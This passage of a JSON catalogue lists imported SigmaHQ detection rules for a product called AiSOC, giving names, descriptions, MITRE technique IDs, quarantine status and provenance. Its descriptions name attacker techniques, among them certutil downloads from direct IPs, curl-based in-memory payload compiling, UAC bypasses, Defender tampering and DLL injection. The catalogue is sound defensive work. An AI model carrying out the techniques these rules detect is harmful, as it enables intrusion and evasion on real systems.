"detections/sigma-imports/_quarantine/potential-winnti-dropper-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml" } }, { "id": 
"sigmahq-sigma-1321dc4e-a1fe-481d-a016-52c45f0c8b4f", "type": "detection", "name": "Windows Defender Exclusions Added", "description": "Detects the Setting of Windows Defender Exclusions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-exclusions-added.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_config_change_exclusion_added.yml" } }, { "id": "sigmahq-sigma-1327381e-6ab0-4f38-b583-4c1b8346a56b", "type": "detection", "name": "Potential Command Line Path Traversal Evasion Attempt", "description": "Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-command-line-path-traversal-evasion-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml" } }, 
{ "id": "sigmahq-sigma-138d3531-8793-4f50-a2cd-f291b2863d78", "type": "detection", "name": "Suspicious Service Path Modification", "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-service-path-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "138d3531-8793-4f50-a2cd-f291b2863d78", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml" } }, { "id": "sigmahq-sigma-139bdd4b-9cd7-49ba-a2f4-744d0a8f5d8c", "type": "detection", "name": "Okta Admin Role Assignment Created", "description": "Detects when a new admin role assignment is created. 
Which could be a sign of privilege escalation or persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-admin-role-assignment-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "139bdd4b-9cd7-49ba-a2f4-744d0a8f5d8c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_admin_role_assignment_created.yml" } }, { "id": "sigmahq-sigma-13acf386-b8c6-4fe0-9a6e-c4756b974698", "type": "detection", "name": "Remote PowerShell Sessions Network Connections (WinRM)", "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-powershell-sessions-network-connections-winrm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_remote_powershell_session.yml" } }, { "id": 
"sigmahq-sigma-13addce7-47b2-4ca0-a98f-1de964d1d669", "type": "detection", "name": "SCM Database Handle Failure", "description": "Detects non-system users failing to get a handle of the SCM database.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scm-database-handle-failure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13addce7-47b2-4ca0-a98f-1de964d1d669", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_scm_database_handle_failure.yml" } }, { "id": "sigmahq-sigma-13c02350-4177-4e45-ac17-cf7ca628ff5e", "type": "detection", "name": "Files With System DLL Name In Unsuspected Locations", "description": "Detects the creation of a file with the \".dll\" extension that has the name of a System DLL in uncommon or unsuspected locations. 
(Outside of \"System32\", \"SysWOW64\", etc.).\nIt is highly recommended to perform an initial baseline before using this rule in production.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/files-with-system-dll-name-in-unsuspected-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13c02350-4177-4e45-ac17-cf7ca628ff5e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_creation_system_dll_files.yml" } }, { "id": "sigmahq-sigma-13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", "type": "detection", "name": "Windows Update Error", "description": "Detects Windows update errors including installation failures and connection issues. 
Defenders should observe this in case critical update KBs aren't installed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1584" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-update-error.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml" } }, { "id": "sigmahq-sigma-13db8d2e-7723-4c2c-93c1-a4d36994f7ef", "type": "detection", "name": "Potential In-Memory Download And Compile Of Payloads", "description": "Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.007", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-in-memory-download-and-compile-of-payloads.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13db8d2e-7723-4c2c-93c1-a4d36994f7ef", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_susp_in_memory_download_and_compile.yml" } }, { "id": "sigmahq-sigma-13e6fe51-d478-4c7e-b0f2-6da9b400a829", 
"type": "detection", "name": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-downloaded-from-direct-ip-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml" } }, { "id": "sigmahq-sigma-13f08f54-e705-4498-91fd-cce9d9cee9f1", "type": "detection", "name": "Potentially Suspicious Shell Script Creation in Profile Folder", "description": "Detects the creation of shell scripts under the \"profile.d\" path.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-shell-script-creation-in-profile-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13f08f54-e705-4498-91fd-cce9d9cee9f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml" } }, { "id": "sigmahq-sigma-13f2d3f5-6497-44a7-bf5f-dc13ffafe5dc", "type": "detection", "name": "Azure Login Bypassing Conditional Access Policies", "description": "Detects a successful login to the Microsoft Intune Company Portal which could allow bypassing Conditional Access Policies and InTune device trust using a tool like TokenSmith.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-login-bypassing-conditional-access-policies.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13f2d3f5-6497-44a7-bf5f-dc13ffafe5dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/audit/microsoft365_bypass_conditional_access.yml" } }, { "id": "sigmahq-sigma-13f81a90-a69c-4fab-8f07-b5bb55416a9f", "type": "detection", "name": "Google Cloud Service Account Disabled or Deleted", "description": "Identifies when a service account is disabled or deleted in Google Cloud.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-service-account-disabled-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13f81a90-a69c-4fab-8f07-b5bb55416a9f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_service_account_disabled_or_deleted.yml" } }, { "id": "sigmahq-sigma-13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "type": "detection", "name": "DHCP Server Loaded the CallOut DLL", "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dhcp-server-loaded-the-callout-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml" } }, { "id": "sigmahq-sigma-1412aa78-a24c-4abd-83df-767dfb2c5bbe", "type": "detection", "name": "Potentially Suspicious WebDAV LNK Execution", "description": "Detects possible execution via LNK file accessed on a WebDAV server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potentially-suspicious-webdav-lnk-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1412aa78-a24c-4abd-83df-767dfb2c5bbe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_webdav_lnk_execution.yml" } }, { "id": "sigmahq-sigma-1444443e-6757-43e4-9ea4-c8fc705f79a2", "type": "detection", "name": "Boot Configuration Tampering Via Bcdedit.EXE", "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/boot-configuration-tampering-via-bcdedit-exe.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml" } }, { "id": "sigmahq-sigma-145095eb-e273-443b-83d0-f9b519b7867b", "type": "detection", "name": "PDF File Created By RegEdit.EXE", "description": "Detects the creation of a file with the \".pdf\" extension by the \"RegEdit.exe\" process.\nThis indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.", "version": 
"1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pdf-file-created-by-regedit-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "145095eb-e273-443b-83d0-f9b519b7867b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_regedit_print_as_pdf.yml" } }, { "id": "sigmahq-sigma-145322e4-0fd3-486b-81ca-9addc75736d8", "type": "detection", "name": "Use of UltraVNC Remote Access Software", "description": "An adversary may use legitimate desktop support and remote access software, to establish an interactive command and control channel to target systems within networks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-ultravnc-remote-access-software.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "145322e4-0fd3-486b-81ca-9addc75736d8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ultravnc.yml" } }, { "id": "sigmahq-sigma-146aace8-9bd6-42ba-be7a-0070d8027b76", "type": "detection", "name": 
"Potentially Suspicious Child Process Of WinRAR.EXE", "description": "Detects potentially suspicious child processes of WinRAR.exe.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-child-process-of-winrar-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "146aace8-9bd6-42ba-be7a-0070d8027b76", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrar_susp_child_process.yml" } }, { "id": "sigmahq-sigma-14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", "type": "detection", "name": "Okta User Account Locked Out", "description": "Detects when a user account is locked out.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-user-account-locked-out.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_user_account_locked_out.yml" } }, { "id": "sigmahq-sigma-148431ce-4b70-403d-8525-fcc2993f29ea", 
"type": "detection", "name": "Potential DLL Injection Or Execution Using Tracker.exe", "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-injection-or-execution-using-tracker-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "148431ce-4b70-403d-8525-fcc2993f29ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml" } }, { "id": "sigmahq-sigma-14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "type": "detection", "name": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-obfuscation-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml" } }, { "id": "sigmahq-sigma-14c71865-6cd3-44ae-adaa-1db923fae5f2", "type": "detection", "name": "Tamper Windows Defender - ScriptBlockLogging", "description": "Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tamper-windows-defender-scriptblocklogging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml" } }, { "id": "sigmahq-sigma-14f3f1c8-02d5-43a2-a191-91ffb52d3015", "type": "detection", "name": "RDS Database Security Group Modification", "description": "Detects changes to the security group entries for RDS databases.\nThis can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet, a wider audience within the VPC or that removal of valid rules has occurred which could impact the availability of the database to legitimate services and users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": 
false, "path": "detections/sigma-imports/_quarantine/rds-database-security-group-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "14f3f1c8-02d5-43a2-a191-91ffb52d3015", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_rds.yml" } }, { "id": "sigmahq-sigma-152f3630-77c1-4284-bcc0-4cc68ab2f6e7", "type": "detection", "name": "Shell Open Registry Keys Manipulation", "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002", "T1546.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-open-registry-keys-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" } }, { "id": "sigmahq-sigma-15434e33-5027-4914-88d5-3d4145ec25a9", "type": "detection", "name": "Potential Product Reconnaissance Via Wmic.EXE", "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-product-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "15434e33-5027-4914-88d5-3d4145ec25a9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_product.yml" } }, { "id": "sigmahq-sigma-1543ae20-cbdf-4ec1-8d12-7664d667a825", "type": "detection", "name": "Suspicious Commands Linux", "description": "Detects relevant commands often related to malware or hacking activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-commands-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1543ae20-cbdf-4ec1-8d12-7664d667a825", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_susp_cmds.yml" } }, { "id": "sigmahq-sigma-1547e27c-3974-43e2-a7d7-7f484fb928ec", "type": "detection", "name": "Registry Persistence via Service in Safe Mode", "description": "Detects the modification of 
the registry to allow a driver or service to persist in Safe Mode.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-persistence-via-service-in-safe-mode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml" } }, { "id": "sigmahq-sigma-155c7fd5-47b4-49b2-bbeb-eb4fab335429", "type": "detection", "name": "Add Windows Capability Via PowerShell Script", "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add Windows capabilities. 
Notable capabilities could be \"OpenSSH\" and others.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-windows-capability-via-powershell-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml" } }, { "id": "sigmahq-sigma-155dbf56-e0a4-4dd0-8905-8a98705045e8", "type": "detection", "name": "UAC Bypass Abusing Winsat Path Parsing - File", "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-abusing-winsat-path-parsing-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml" } }, { "id": "sigmahq-sigma-15619216-e993-4721-b590-4c520615a67d", 
